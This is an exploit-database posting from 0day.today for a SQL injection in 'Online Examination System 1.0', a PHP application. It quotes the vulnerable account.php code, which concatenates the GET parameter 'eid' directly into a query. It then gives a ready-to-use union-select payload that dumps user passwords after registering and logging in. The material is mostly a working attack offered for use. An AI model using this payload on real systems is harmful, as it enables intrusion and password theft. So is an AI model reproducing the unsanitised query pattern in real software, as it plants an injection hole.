[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Online Examination System 1.0 SQL Injection Vulnerability

Author
Yousef Alraddadi
Risk
[
Security Risk High
]
0day-ID
0day-ID-38001
Category
web applications
Date add
29-09-2022
Platform
php
# Exploit Title: Online Examination System - SQL Injection
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

Vulnerability Details
======================

Steps :

vulnerable code in file account.php

<?php
if(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {
$eid=@$_GET['eid'];
$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );
echo '<div class="panel" style="margin:5%">';
while($row=mysqli_fetch_array($q) )
?>

1) Log in to the application after register new user

inject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--

#  0day.today [2024-12-25]  #